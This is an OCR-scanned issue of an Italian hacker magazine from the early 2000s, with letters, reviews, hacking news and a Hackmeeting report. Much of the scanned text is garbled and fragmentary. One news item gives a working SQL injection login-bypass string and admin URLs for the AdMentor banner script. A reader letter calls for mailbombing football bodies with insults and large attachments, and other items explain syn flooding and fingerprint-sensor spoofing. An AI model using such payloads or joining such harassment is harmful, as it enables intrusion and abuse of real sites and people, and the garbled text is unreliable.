
ck'er (hàk'ar) 

sona che si diverte ad esplorare i dettagli dei 
mi di programmazione e come espandere le loro 
wità, a differenza di molti utenti, che preferiscon 
™rare solamente il minimo p°™ecsEirin » 



TfrMP* 



WtftOHl 



Fa caldo. Fa molto caldo. Sicuramente non 
sono il solo a sentire che le dita appiccicano 
sulla tastiera, il tappetino del mouse umidic- 
cio, e i neuroni che faticano a collegarsi tra lo- 
ro. Vi immagino davanti ai vostri PC, una bibi- 
ta ghiacciata di lato, ma senza ventilatore: 
quello è riservato al computer, che ne ha dav- 
vero bisogno, specialmente dopo l'ultimo 
overclocking. Nonostante tutto andiamo avan- 
ti a lavorare, noi e il computer. Un'occhiata 
fuori dalla finestra, sognando il mare, una sul- 
la finestra del browser. E guardando a quanto 
accade nella Rete italiana, non si può non no- 
tare che anche lì l'atmosfera è molto calda. Al- 
cuni siti di hacking vengono sequestrati dalle 
forze dell'ordine; altri vengono sospesi o ri- 
mossi dagli stessi provider, timorosi di essere 
ritenuti responsabili dei contenuti serviti ai 
propri utenti. Una forma di auto censura sub- 
dola, che genera poco clamore, ma è persino 
più odiosa di quella operata dalle autorità. 

grAnd@hackerjournal.it 



Danni in rete 



Nuove vittime! 
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QUESTO |SPAZ i « 
'aIpPROF I TTATENE, 



LAVORARE QUELLA TASI 




FATE 




OPEN SOURCE 






L'etica hacker è un'altra cosa? Siete sicuri? 



^ N ^ 




Salve, vi scrivo per 
esprimere il mio 
parere su HJ. 
I Sinceramente 
. mi sono risenti- 
| to molto quan- 
do ho letto del- 



"Ma siamo 
impazziti?" mi 
sono chiesto... 
"Cos'è 'sta roba?". 
Effettivamente ci sono tante cose che mi 
lasciano perplesso... 

1) Caspita, questa rivista ha la pretesa di 
parlare del mondo Underground di 
Internet... ma sapete cosa significa la 
parola "Underground"? Vuol dire "che sta 



sotto", e voi invece volete p 



e del sole tutto quello eh 



-and ri della rete. L'aspetto 
"Underground" dell'hacking è stato di 
fondamentale importanza per lo svilup- 
po particolare che ha avuto questa 
comunità. Diciamo che è stata una sorta 
di "selezione naturale". 

2) Non pensate che certe informazioni 
sbandierate ai quattro venti possano 
finire in mano a delle pesone malinten- 



zionate? E dopo ci lamentiamo del I 



e hacker = delinquente!!! 

3) lo mi ritengo un hacker e penso di 
essere diventato tale dopo mesi e mesi 
di studio su tutorial, guide, e-zine eccete- 
ra. Ho sudato per cercare certe informa- 
zioni, certi tools e adesso e adesso inve- 
ce mi ritrovo questa rivista in edicola, 
accessibile a qualsiasi ragazzetto che 
voglia fare danni... caspita non tutti pos- 
sono diventare Hacker!!! L'Hacking è uno 



stile di vita, non un passatempo da sfo- 
gliare!! 

4) L'hacking ha un contenuto tecnico 
molto elevato... se gli articoli di questa 
rivista coprono solo in maniera "superfi- 
ciale" certi argomenti allora vuol dire che 
il suo manifesto è il seguente: "...ehi noi 
siamo gli hacker!! Facciamo questo, que- 
sto e questo... sappiamo fare tutto con il 
PC e vogliamo dimostrarlo al mond o!". 
Questa non è etica hacker!! Non d. 
mo dim 
noi stes 

Rispetto la vostra iniziativa che so avrà 
richiesto grandissimi sforzi ed essere 
nata da buone intenzioni. Ma per favore 
non chiamate questa rivista "Hacker 
Journal"... personalmente come seguace 
della cultura hacker mi dissocio comple- 
tamente dalla vostra pubblicazione. 

d3cod3r 

Siamo d'accordo con te quando parli del- 
l'hacking come stile di vita. 
Per quanto riguarda i lamer, gli script 
kiddies e i malintenzionati, questi esisto- 
no a prescindere da noi. Diversamente 
da quando probabilmente hai mosso i 
primi passi da hacker, in rete oggi gior- 
no si trova tutto. Quello che abbiamo 
fatto noi, è stato aprire una finestra di 
carta su questo mondo, e creare un 
punto di aggregazione e confronto. 
Le responsabilità che ci assumiamo 
volentieri sono quella di portare in edi- 
cola questa rivista ogni due settimane, e 
quelle di dare spazio a chiunque voglia 
prenderselo. 

Compreso chi, come te, non è d'accordo 
con noi. Anche questo, scusaci, è essere 
Underground. 




L'undergound italiano 
, si è risentito 

dell'uscita di HJ 

■ 

perché in una 
certa misura la 
rivista "spiega" 
come diventare 
un hacker. M_ 
punto è che 



"diventare" un h 
è possibile solo 

' '"Questo 

bug semantico non è da sottovalutare. 
Esiste una dimensione in cui è possibile 
essere un hacker senza possedere un 
calcolatore ed essere un pirla che fa ciò 
che vuole con un PC. 

Gas 
www.manicomio.tv 

Ancora una volta siamo solo 
parzialmente d'accordo. Chiunque può 
diventare ciò che vuole, altrimenti 
significherebbe che esiste da qualche 
parte un "gene dell'hacking", e noi 
francamente non ci crediamo. Diciamo 
però che, per trasformare se stessi in un 
certo modo, non si può puntare a un 
risultato a prescindere dalle motivazioni 
e dai metodi utilizzati. Altrimenti è un po' 
come dire "sarei disposto a uccidere pur 
di diventare santo", oppure sperare di 
diventare campione olimpico di atletica 
senza fare neanche mezz'ora di corsa. 
Secondo noi, per diventare hacker, invece 
che tempestare i canali Ire alla ricerca di 
qualcuno disposto a scambiare exploit 
come fossero figurine, bisogna 
cominciare a chiedersi come funzionano 
le cose, tanta curiosità, mentalità aperta, 
e voglia di "sporcarsi le mani" (lasciando 
pulita la fedina penale). 



UN GIORNALE PER TUTTI: SIETE NEIDOIE Q UERI HRCKERS? 



\HaH/ \oAHAoy 



MIO HACKING 



HARD HACKING 



Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac- 
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si 
fa per dire) e smanettoni per i quali il computer non ha segreti. Ogni artico- 
lo di Hacker Journal viene allora contrassegnato da un level: NEWBIE (per 
chi comincia), MIDHACKING (per chi c'è già dentro) e HARDHACKING (per chi 
mangia pane e worm). 
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ttima la rivista, forse un po' complicata, ma 



Non è giusto nei confronti di quelli che 
spendono 2 Euro per comprare la rivista!!! E poi 
non rischiate che tanta gente smetta di com- 
prare il giornale? A parte questo, complimenti. 

Se i PDF sono disponibili on-line, è solo per of- 
frire un servizio a voi lettori, che potete così 
avere un archivio di numeri arretrati. La scelta 
poi "rispetta" la filosofia della libera e gratuita 
circolazione delle informazioni in rete (filosofia 
che si sta un po' perdendo). Noi, anzi, stiamo 
anzi facendo una scommessa sulla nostra pelle, 
nel senso che scommettiamo che non saranno 
in tanti ad attendere la pubblicazione on-line 
come arretrato, pur di risparmiare 2 Euro. Del 
resto, la rivista si può leggere sull'autobus, sot- 
to il banco a scuola o al ce**o (provateci con un 
monitor!), e l'inchiostro per stampare 32 pagine 
in Pdf costa ben più di 2 Euro. E poi, se vi piace 
il giornale, dovrete pure farci campare. 



ome ho già scritto nel forum, 
l'aiuto che mi avete da 

le di stato: i vostri articoli erano pie- 
ni di spunti preziosi per la traccia 4 di ti- 
pologia B. Volevo solo chiedere, in rela- 
zione al Linux, che non 
conosco, ma vorrei 
scaricare ed impa- 
rare ad usare, se 
la versione giusta 
è, come credo la 
PPC! 



Severissimus 



Per un attimo ho temuto che avessi bucato qual- 
che server del Ministero della Pubblica Istruzione 
alla ricerca delle tracce. Poi ho capito che si trat- 
tava della traccia su informazione, commercio e 
bla bla nell'era di Internet :) Linux PPC, che citi 
nella mail, è una distribuzione per macchine con 
processori Power PC (sostanzialmente, i Macin- 
tosh, alcune workstation Unix IBM e 
poco altro). Se hai un Mac, puoi 
scegliere anche la SuSE Li- 
nux PPC o YellowDog Li- 
nux, che piace a parecchi 



ono un vostro lettore e vor- 
rei ricevere una copia del N.1 

perché non sapevo dell'uscita. Come fare per 

averla???? 



La gestione degli arretrati per ora è un po' ostica, 
ma ci stiamo attrezzando, Intanto, puoi trovare le 
pagine dei numeri arretrati sul sito (www.hacker- 
journal.it), in formato Pdf. Aggratis. . 



o letto in giro che e possibile 
roccare" una videocamera d 
ner registrare dati invece che 
È vero? Potrebbe essere como- 
do per fare dei backup e per "na- 
scondere" file di grandi dimensioni 
in un luogo dove nessuno li cerche- 
rebbe... 

pOldO 

La trovata è interessante, e merita 
di essere approfondita. Le video- 
camere digitali Mini DV sono or- 
mai abbastanza diffuse, e hanno 
parecchie caratteristiche che le ren- 
derebbero ideali come unità di bac- 
kup: la velocità di trasferimento attra- 
verso la porta FireWire è molto elevata 
(circa 3,7 Mb al secondo nel caso delle vi- 
deocassette Mini DV), e una cassetta da 60 
minuti può contenere l'equivalente di 13 
Gbyte. In effetti, questa proposta rimbalza 

SUPER |l_ I NUS!| 



in rete da mesi e mesi, ma al momento non ci ri- 
sulta che esista un programma che si occupi dei 
passaggi necessari. In pratica, basterebbe che il 
programma prendesse i dati già raggruppati in 
un unico file (un .tar sotto *nix o uno .zip in 
Windows, e poi aggiungere gli header e i codi- 
ci di controllo che contraddistinguono i file vi- 
deo DV. 



A questo punto, il file verrebbe visto da un soft- 
ware di editing video come se fosse un nor- 
male filmato, e in questa forma potrebbe 



essere trasferito alla videocamera. Per re- 
cuperare i dati, eseguite il procedimento in- 
verso. Se c'è qualcuno tra i lettori che vuole 
realizzare un programma di questo tipo, ne 
parleremo ben volentieri. 



yo provato Camouflage, presentato nel nu- 
mero 2, e l'ho trovato molto divertente. Vo- 
levo però fare una precisazione: più che un 
programma di cifratura, si tratta in realtà di un 
programma per steganografia. Per tutti i Iette- 
rebbe essere utile la lettura di u 



li di crittografia, steganografia. 
Si tratta di Kriptonite, che non si trova più in li- 
breria ma si può scaricare dall'indirizzo 
www.ecn.org/kriptonite. 



.IOE LIETTA 
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I ND I PENDE NT 



alve a tutti ragà! Il popolo di Internet sta 
organizzando questa iniziativa: SCRIVETE 
quanto più potete a queste mail: 

> sales@fifa-hospitality.com 

> press@figc.it 

> media@fifa.org 

> info@ecuafutbol.org 

e PROTESTATE con tutto l'odio che avete!!! 
Mandate insulti o allegati di grosse dimensioni, 
fatevi valere! DIMOSTRIAMO CHE L'ITALIA CON- 



TA ANCHE SU INTERNET !!! Protestate per il trat- 
tamente che gli arbitri ci hanno riservato a que- 
sti mondiali di Calcio, protestiamo con la Fifa! 
Sono fiducioso del vostro contributo. 
Ciao a tutti 

Nobile Nobily 

Ci aggiungo un altro indirizzo, quello della Fe- 
derazione calcistica Equadoregna, che sul suo 
sito sostiene che l'arbitro Byron Moreno ha fat- 
to un ottimo ed equilibrato arbitraggio 
(www.ecuafutbolonline.org/detalle.asp7id =921 ). 



A scanso di equivoci, chiariamo che se per 
"bombardare" si intende che poche persone 
fanno un mailbombing mandando centinaia 
di messaggi ciascuna, la cosa non sembra poi 
così ganza. Che ci vuole a farlo? 
Diverso invece è mobilitare centinaia o mi- 
gliaia di persone che mandano tutte una mail, 
con anche solo un parere o un "civile" insulto. 
Ci vuole un lavoro di ben altro tipo: sensibiliz- 
zazione, informazione, mobilitazione. 
Roba che non puoi fare con un programmino. 
Chiamalo, se vuoi, "hacking delle coscienze". 



hackerjOUrnal.it, il muro per i vostri graffiti digitali! 



Le 32 pagine di Hacker Magazine 

le divorate in qualche giorno, e poi dovete 

attendere ancora più di una settimana 

per il numero seguente? 

Non demoralizzatevi: se la carta finisce, 

rimane sempre il Web. 

Su www.hackerjournal.it potete trovare 

l'allegra brigata dei collaboratori e dei 

lettori della rivista, notizie e anticipazioni 

succose e tutti i numeri arretrati. 






Qualcuno vorrebbe che noi pubblicassimo 

gli indirizzi email dei lettori che 

ci scrivono. Per questioni di"comprensibile" 

riservatezza, noi abbiamo scelto 

di pubblicare solo gli indirizzi completi 

di chi ce lo richiede espressamente. 

Ricordatevelo quando ci scrivete. 



In tanti ci avete scritto che sul numero 3 non 
erano presenti per intero i codici per entrare 
nell'area riservata del sito della rivista (hacker- 
journal.it). Purtroppo, per un errore di stampa, 
è saltata la riga con il secondo codice. Riportia- 
mo di seguito i codici giusti (che Adobe ci assi- 
sta nella stampa del Pdf...). 



user: 
pass: 



s3ql% 
1K5&C 



PS: però, un vero hacker la password non la 
chiede: la trova! :) 



L'area riservata ai lettori, 
in cui si entra con la pas- 
sword stampata sulla rivista. 



in formato Pdf! 



Le recensioni dei vostri siti 

e gli appuntamenti 

da non perdere. 



Che sia notte o giorno, qui tro 
vi sempre qualcuno con cui 
ca%%eggiare... 




Link diretti 
alle immagi- 
ni CD delle 
più famose 
distribuzioni 



Lascia 
un pensiero 
digitale 
nel nostro 
Guestbook: 
il tuo nick 
sarà pubbli- 
cato in fondo 
alla rivista! 



Quali altri siti ti lasciano 
vedere le statistiche di acces- 
so? Scopri quanti sono i visita- 
tori di hackerjournal.it e quali 
sistemi usano. 



imam in contatto co 



iscrivendoti alla n 
newsl 
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L'ETICA DELL'HACKER 



L'etica hacta 



Categoria: Net- 
work Security 
Casa editrice: Fel- 
trinelli 

Pagine: 172 
Lingua: italiano 
autore: Pekka Hi- 
manen 

Data di pubbli- 
cazione: 2001 



RIVOLUZIONARIO 
PER CASO 



3 
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Categoria: 

work Security 
Casa editrice: 
Garzanti 
Pagine: 285 
Lingua: italiano 
autore: Linus Tor- 
valds e David Dia- 
mond 

Data di pubbli- 
cazione: 2001 



ACTIVE DEFENSE 
A COMPREHENSIVE 
GUIDE TO NET 
WORK SECURITY 



HlT 



DEFEISE 

I /!■ Ili 4*L#»+D 




Categoria: Net- 
work Security 
Casa editrice: 
Sybex 

Pagine: 723 
Lingua: inglese 
Cd Rom autore: 
Chris Brenton Came- 
ron Hunt 

Data di pubbli- 
cazione: 2001 




O GLI HACKER "AGGREDISCONO" BYRON MORENO □ 



fi | on è piaciuta neanche ai cracker la sconfit- 
ti! ta contro la corea. Né, tantomeno l'arbitrag- 
gio di Byron Moreno. 

Contro di lui e contro Blatter si scagliano sia 
il cracker "Spabaton", che sul sito della 
provincia di Verona propone un tiro al bersaglio 
contro l'arbitro, sia "anrksys", che sui forum 
dell'italiano Tax & Lex e dell'americano Hay- 
na.com prende in gito Moreno parodiando un 
celebre spot televisivo. 

Bisogna sottolineare che i siti Web della Pubbli- 
ca Amministrazione periferica, come quello del- 
la provincia di Verona appunto, appaiano sem- 
pre più spesso nelle liste dei siti violati: forse 
bisognerebbe consigliare loro di passare a 
software open source e affidare la gestione 
del sito a un hacker competente. « 



O AD MENTOR BUCATO 



FRB NflX EimT.NTICÀRI-: 

fkuvikv ni\i>"vrrr\nE 
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|| na grave falla che colpisce AdMentor, un 

{/ diffusissimo script per la gestione di banner 
online. Realizzato sia con le Asp, sia con Php, 



soffre di un buco per colpa del quale, chiunque 
può accedere al Pannello di controllo come 
amministratore, con le problematiche che si 
possono immaginare. 

Caricando infatti la pagina di Login (qualcosa ti- 
po nomesito.it/admentor/admin/login.asp o no- 
mesito.it/phpadmentor/admin/index.php a se- 
conda delle versioni) e inserendo la stringa 
'or"=' Come username e password, si riesce 
ad accedere come amministratore. È una strin- 
ga famosa per chi progetta applicazioni pro- 
tette, ma evidentemente chi ha realizzato Ad- 
Mentor non vi ha fatto attenzione... m 



O A LONDRA NIENTE SUPERSORVEGUANZA 



□ 



yi ccesso alle informazioni private, alle 
r\ email, alle registrazioni di telefonate da 

parte di enti locali, autorità e burocrazie provin- 
ciali e non solo da parte di organi di polizia e di 
sicurezza. Questo il profilo del decreto con cui il 
Governo inglese ha tentato di modificare le at- 
tuali normative sul monitoraggio delle comuni- 
cazioni private. Un decreto che ha suscitato al- 
larme e indignazione ben al di fuori dei confini 
britannici. Ma il Governo, proprio a causa del- 
la forte reazione alla proposta, ha annuncia- 
to di voler ritirare il decreto e venire incontro 
alle "modifiche spia", come sono state definite 




le proposte del Governo dall'opposizione politica 
e dai gruppi che si battono per difendere quel 
che resta della privacy dei cittadini. « 



*LA DISUMANITÀ 1 DEL COMPUTER STA NEL FATTO 
CHE, UNA VOLTA PROGRAMMATO E 

MESSO IN FUNZIONE, SI COMPORTA IN MANIERA PER- 
FETTAMENTE ONESTA- x B 

> Isaac Rsimou 
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NEWS 



O MITNICK A RUOTA UBERA. 



□ 




jr^evin Mitnick, 38 anni, incarcerato per essersi 
A introdotto nei sistemi delle maggiori aziende 
statunitensi, ha detto che le norme proposte dopo 
l'attacco dell'1 1 settembre sono "ridicole". "I terro- 
risti hanno dimostrato che ciò che interessa loro 
sono omicidi di massa, e non piccoli hackeraggi ai 
sistemi in rete. Ciò nonostante, il governo vuole 
che il popolo americano gli firmi una cambiale in 
bianco, per arrogarsi il potere di spiare a suo 
piacimento nelle comunicazioni di chiunque". 
Mitnick mette in guardia sul fatto che presunti 
hackers rischierebbero di essere colpiti a casaccio 
da pesanti sentenze esemplari di condanna alla 
detenzione. "Credetemi - ha detto ai suoi intervi- 
statori - tutti voi potrete essere il prossimo ber- 
saglio di una tremenda caccia all'uomo". 
Mitnick, la cui carriera gli è valsa una menzione 
nel Guinness dei primati come l'hacker più famoso 
del mondo, dice di essere una vittima delle circo- 
stanze. "Non sono innocente, ma certamente non 
ho fatto la maggior parte delle cose di cui sono 



stato accusato. Un hacker non distrugge delibera- 
tamente dati né trae profitto dalle sue attività. L'- 
hacking non mi ha mai fatto guadagnare un cen- 
tesimo. Non ho agito con dolo. La gran parte degli 
atti eticamente riprovevoli che commesso è stata 
fatta per pararmi il culo quando ero ricercato". Sul 
fatto ad esempio di essersi introdotto nelle email 
del reporter del New York Times John Markoff, 
che stava scrivendo dell'indagine dell'FBI nei suoi 
confronti, Mitnick dice: "Ho letto alcune di quelle 
email perché vi si diceva come l'FBI mi avrebbe in- 
dividuato. Non le ho lette tutte, ho solo cercato le 
combinazioni di lettere che compongono il mio no- 
me, e parole come 'trappola', 'traccia' o cose del 
genere. Lo ripeto, è qualcosa che ho dovuto fare 
per pararmi il culo, solo per garantirmi l'incolumità 
personale". Dopo l'accaduto, lui e Markoff hanno 
scritto insieme un libro sulla faccenda. Chiamato a 
testimoniare davanti a una commissione del Se- 
nato sui pericoli dell'hacking mosso da finalità po- 
litiche, Mitnick ha detto di continuare a credere 
che il cyberterrorismo può essere facilmente com- 
battuto rafforzando la sicurezza delle infrastrutture 
di enti pubblici e privati e non inasprendo le san- 
zioni penali. "Certo, un eccellente team di hackers 
potrebbe far saltare i sistemi delle imprese di co- 
municazione, delle istituzioni e magari dei mercati 
finanziari. Ma tutti questi sistemi sarebbero di 
nuovo online molto in fretta: non li puoi far fuori 
per davvero per un periodo esteso nel tempo. Quel 
che invece può accadere è che certi attacchi 
siano utilizzati per fuorviare l'attenzio- 
ne da piani di azioni più pericolose, ma 
non è roba da hackers". r* 



MICROSOFT NON SFORNA SOLO BUCHI, 
DISTRIBUISCE ANCHE VIRUS 



/partner Microsoft della Corea del Sud (male- 
detti! Per molti motivi...) hanno ricevuto da 
Microsoft una serie di CD di Visual Studio.net 
nei quali, oltre al software di sviluppo, era an- 
nidato, sorpresona, anche il virus Nimda. 
Nell'imbarazzo generale, i responsabili della so- 
cietà di Redmond si sono affrettati a diffondere 
un messaggio per tranquillizzare i propri partner, 
specificando che la colpa non è della casa ma- 
dre, ma di una società a terza cui la Microsoft 
aveva affidato la traduzione del software in co- 
reano. 

Microsoft ritiene improbabile che il virus conte- 
nuto nei CD riesca ad infettare la macchina sul- 
la quale viene installato il pacchetto e che dai 
primi controlli nessuna altra versione localizzata 
risulta essere infetta. Un brutto colpo per la casa 
di Zio Bill, anche se sono in tanti a sostenere che 




è da anni che Microsoft distribuisce un virus: si 
chiamerebbe Office, e quando infetta una persona, 
obbliga tutti i suoi interlocutori a spendere un sac- 
co di soldi per leggere i suoi documenti. SI 



3 IL MUSEO NORVEGESE 
RITROVA LA PASSWORD 

iiiel numero tre avevamo dato la notizia del 
III museo norvegese che, dopo la morte del 
custode degli archivi in rete, aveva smarrito 
la passoword per accedervi di cui il custode 
era l'unico depositario. 

Era stato richiesto l'aiuto degli hacker di 
mezzo mondo. 

Per loro è stato davvero un gioco da ragazzi 
trovare la chiave d'accesso dell'archivio del 
Centro Ivar Aasen di Oslo: Era il nome del do- 
natore dell'archivio scritto al contrario : Lad- 
nejpud, ovvero Dupjendal "allo specchio . 
L'"hacker " che ha ristolto l'enigma è Joa- 
kim Erikson, un giovane svedese che lavora 
per per la SnowCode AB, una piccola impre- 
sa che produce videogiochi per l'XBox di Mi- 
crosoft. 

Il ragazzo ha scoperto la password al primo 
tentativo, dopo che attraverso un software di 
uso comune, da chiunque scaricabile nel sito 
lostpassword.com, aveva scoperto la prima 
lettera. « 

O VULNERABILITÀ 
CISCO UBR71 00/ 
7200 SERIES CABLE 
MODEM ROUTERS 

Cisco ha riportato una vulnerabilità in Cisco 
uBR71 00/7200 Series Cable Modem Rou- 
ters. Un remote user potrebbe bypassare il 
metodo di autentificazione ed accedere alla 
configurazione del device. 
Per contattare direttamente Cisco: 

* +1 408 526 7209 (occhio, è una 
chiamata intercontinentale). 

* e-mail: tac@cisco.com m 
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O SOFTWARE ORIGINALE: CHI E COSTUI? 



□ 




£a pirateria software sta assumendo dimensioni 
preoccupanti. Tra un po' l'eccezione sarà avere 
software originale. In Italia, la pirateria del softwa- 



re rappresenta il 45% dell'intero mercato, gene- 
rando perdite per quasi 470 milioni di dollari (pari a 
circa 500 milioni di euro). Dietro a questo mercato è 
oramai chiaro che ci sia la criminalità organizza- 
ta, perché è un'industria che richiede una diffusione 
capillare e grossi investimenti di denaro, impossibili 
per piccole organizzazioni locali. Si pensi che solo la 
fabbrica per la stampa dei CD costa circa due milio- 
ni di dollari. Se questo è lo stato delle cose, viene da 
chiedersi il perché la stampa "seria" fa titoloni e arti- 
coli su ragazzini che vengono trovati con qualche de- 
cina di programmi pirata, o perché la BSA (il consor- 
zio anti pirateria) si preoccupi tanto delle piccole 
aziende che copiano software: non sarebbe meglio 
andare alla fonte, e contrastare seriamente quella 
che si può ormai chiamare "mafia del software"? 



O CI SONO PIÙ VIRUS CHE PENSIONATI 



O C***0, MI HANNO 
FREGATO 
LE IMPRONTE! 

Fino a qualche tempo fa si parlava dei bi- 
scotti della nonna, oggi in cucina si posso- 
no realizzare stuzzichini per bipassare i lettori 
di impronte digitali, uno dei mezzi più diffusi 
per cercare di evitare le intrusioni in PC e am- 
bienti riservati. 

A gettare nel panico più nero i produttori di 
scanner per impronte è stato Tsutomu Matsu- 
motu, uno studente laureato in scienze am- 
bientali e informatiche alla Yokoama National 
University, ha spiegato come sia possibile 
realizzare con ingredienti che si trovano 
ovunque (da libro della nonna appunto) del- 
le dita di gelatina su cui imprimere l'im- 
pronta digitale di qualcun altro e usarla per 
ingannare i sensori dei lettori di impronte. 
Il "gummy finger" (dito di gomma); è in grado 
di ingannare 1 1 diversi lettori di impronte, con 
una percentuale di successo compresa fra il 
70 e il 95 per cento. 

Matsumoto ha però spiegato un ulteriore me- 
todo per rilevare le impronte, molto più effica- 
ce: con l'ausilio di un microscopio basta ri- 
pulire l'immagine con strumenti per l'elabo- 
razione fotografica digitale e quindi stampare 
l'immagine su un supporto lucido. Questo 
supporto è utilizzato per impressionare una 
scheda con circuito stampato fotosensibile 
(reperibile nei negozi di hobbistica), che viene 
quindi incisa per creare l'immagine dell'im- 
pronta digitale sulla scheda. Infine si versa la 
gelatina sull'immagine incisa e si lascia 
raffreddare, creando il dito di gomma, cj 



Secondo un rapporto di MessageLabs i virus 
informatici proliferano sempre più in fretta 
per via della loro diffusione via e-mail. 
Negli ultimi tempi la palma di presenzialista, ne- 
gli hard disk degli utenti, spetta a Klez nelle 
sue molteplici varianti che è stato responsa- 
bile di più della metà dei messaggi infetti. 
Klez, che è nato come worm mass-mailing, re- 
lativamente innocuo, si è trasformato via via, 
dando origine a versioni più pericolose, man 
mano che gli autori di virus modificavano il co- 
dice originale; il risultato finale, la variante 
Klez.h, ha dato luogo a un'epidemia assai diffu- 



sa. SirCam, venuto alla luce l'anno scorso, è 
stato il secondo virus in ordine di gravità, re- 
sponsabile di ben 600.000 infezioni! El 




VULNERABILITÀ GESTIONE CSS INTERNET EXPLORER □ 




-stata riscontrata una vulnerabilità in Internet 
Explorer che permetterebbe ad un attacker 



di causare un Denial of service verso un 
browser del malcapitato che visiti una de- 
terminata pagina. 

La falla è presente nella nella gestione dei tag 
per il CSS (Cascade style sheet) 

software interessati: 

* Internet Explorer version 5 

* Internet Explorer version 5.5 

* Internet Explorer version 6.0 

* Outlook Express 

software immuni: 

* Internet Explorer version 5.1.4 for 
MacOS X ^ 



"NON CE' MOTIVO PER CUI OGNI INDIVIDUO DEBBA 
AVERE UN COMPUTER A CASA SUA*', 

> Ken Olson, Presidente di Digital Equipment, 1977. 
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O PASSI IL CRACKER, AAA IL PIRATA DI SCHEDE NO! □ 




Tempi duri per chi si diletta con schede pira- 
tate per la pay Tv. La giustizia italiana ha 
messo l'occhio su questo tipo di attività, e sta 
agendo con uno slancio repressivo decisamen- 
te superiore alla media. Nei giorni scorsi, il sito 



italiano "Axtermixsat.com, 
studio della decodifica satellita- 
re", è stato sottoposto a seque- 
stro dal Compartimento della Polizia 
Postale e delle Comunicazioni dell'E- 
milia Romagna su disposizione della 
Procura della Repubblica di Forlì. 
Del sito non rimane traccia neanche 
nell'archivio di Google, ma la cosa 
che colpisce e che tra le centinaia di 
siti che trattano di tecnologia under- 
ground, proprio questo sia stato colpito in mo- 
do così repentino. Evidentemente, il pirataggio 
delle schede satellitari colpisce interessi molto 
in alto, e viene quindi perseguito con un acca- 
nimento superiore alla norma. EI 



O IL AAARCHIO DI RAIVEN 



□ 




Potrebbe sembrare 
un videogioco, ma 
in realtà è il marchio 
del cracker che ha de- 
facciato il sito in ASP 
di Energy. Bella la gra- 
fica della home page 
sostituita, probabil- 
mente migliore di quel- 
la originale, ne auspi- 
chiamo fortemente l'a- 
dozione come home 
page definitiva... m 



O ANCHE APACHE NON CI FA DORMIRE. 



□ 
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Si pensava che fosse una delle piattaforme in- 
ternet più sicure ed inattaccabili ma la società 
di sicurezza Internet Security Systems (ISS) ha re- 
so pubblica una vulnerabilità che riguarda uno 
proprio dei più popolari server web open source: 
Apache, che attualmente gira su oltre il 60% dei si- 
ti Internet. Si tratta di una falla che interessa le 
versioni di Apache comprese fra la 1 .3 e la 1 .3.24 
e fra la 2.0 e la 2.0.36. La vulnerabilità risiede nel 
codice che gestisce alcune richieste HTTP e che, 
nel caso di Apache 1 .3.x, possono consentire a 



un aggressore di eseguire del codice a sua 
scelta sul server vittima. Il problema appare in- 
vece meno grave per quel che concerne Apache 
2.x, dove un aggressore può sfruttare la falla per 
lanciare attacchi di tipo DOS ma non per penetra- 
re nel server remoto. 

In attesa di completare lo sviluppo di una patch, 
l'Apache Foundation ha già rilasciato due nuove 
versioni di Apache che correggono il problema: 
la 1.3.25 e la 2.0.39. 
Si trovano agli indirizzi: 

http://www.apache.org/dist/httpd/apa 
che_1 .3.26.tar.gz (signature: 
http://www.apache.org/dist/httpd/apa 
che_1 .3.26.tar.gz.asc ) 
http://www.apache.org/dist/httpd/http 
d-2.0.39.tar.gz (signature: 
http://www.apache.org/dist/httpd/http 
d-2.0.39.tar.Z.asc). ™ 
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O DENIAL OF SERVICE 
ANTI NEWS 

yi Icuni tra i più importanti siti di news a li- 
r\ vello mondiale sono stati bersaglio per ore 
di un massiccio attacco di tipo DDoS (Distri- 
buted Denial of Service) che ha quasi 
completamente bloccato colossi come Fox- 
news.com, Theweatherchannel.com, 
Espn.com e ABCNEWS.com. 
Con molta probabilità l'attacco è stato di tipo 
"syn flood", un metodo di attacco che si ba- 
sa su un difetto architetturale del protocol- 
lo TCP/IP e, più precisamente, sulla procedu- 
ra di avvio delle transazioni TCP (three way 
handshake). Questa procedura avviene quan- 
do due macchine stabiliscono una sessione: 
la prima invia un segmento che contiene una 
richiesta SYN (sincronia); la macchina a cui 
viene spedito il segnale risponde con un seg- 
mento che contiene i messaggi SYN e ACK 
(acknowledge); a questo punto la prima mac- 
china, per far partire la sessione, dovrebbe ri- 
spondere con un segnale ACK. Prima di invia- 
re la risposta, le macchine che ricevono una 
richiesta di apertura di una sessione accanto- 
nano in una zona della memoria la richiesta: 
se la procedura viene eseguita correttamente 
e la sessione viene stabilita, la richiesta verrà 
rimossa dalla memoria, ma se si riesce a fa- 
re in modo che l'invio di numerose richieste 
congestioni tale zona di memoria della 
macchina vittima dell'attacco, questa non 
può più garantire il servizio di rete fino a 
che le numerose richieste non vengano soddi- 
sfatte (cosa che non avverrà mai), m 
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IL PIÙ IMPORTANTE RADUNO HACKER ITALIANO 




S Sval !■■■ I ■ ■■■! !■■! ■■■■ m ■■■■ ■ ■ ■» ■ ■ ■ 

naLZHulBEErinS 

Sfidando un calda micidiale e In sciopera dei treni, grflnd 
e Uargrau sono andati a Bologna per partecipare 
all'edizione 2002 dellHackmeeting. Ecco come è andata. 



Dgni anno, dal 1998, il 
movimento antagonista 
che ruota attorno a Isole 
nella rete e a ecn.org 
I (European Counter Net- 
work) organizza un incontro su più 
giornate, nel quale è possibile con- 
frontarsi su ogni aspetto della (con- 
trocultura, digitale e non. La ricetta 
è semplice: ogni partecipante può 
portarsi un computer o altra attrez- 
zatura tecnica, collegarsi in rete e 
condividere le proprie esperienze e 
conoscenze con quelle degli altri. In 
più, si organizzano incontri e semi- 
nari a tema, secondo un calendario 
concordato e noto in precedenza. 
Nessun argomento è tabù: dai me- 
todi di crittografia al sesso e alla 
prostituzione nell'era di Internet; 
dagli aspetti legali dell'Hacking alle 
tecniche di guerriglia digitale. 

A differenza di altre manifesta- 
zioni un po' asettiche, come Webbit, 
o ai vari Lan Party organizzati dai 
videogiocatori (che montano reti 
che possono collegare migliaia di 



Occhio ai camuffi: ci sono 
dei finti redattori di HJ! 

Il giorno di apertura dell'hackmee- 
ting, alcuni ragazzetti si sono pre- 
sentati come collaboratori di Hac- 
ker Journal, con tanto di magliette e 
tesserini. Il punto è che noi di ma- 
gliette di HJ non ne abbiamo mai 
fatte, e non sappiamo chi fossero 
queste persone. Ancora non abbia- 
mo capito se i veri bersagli dello 
scherzo, siamo noi o l'Hackmeeting, 
ma ci piacerebbe conoscere i "sim- 
paticoni". Quanto meno, per otte- 
nere le loro magliette come risarci- 
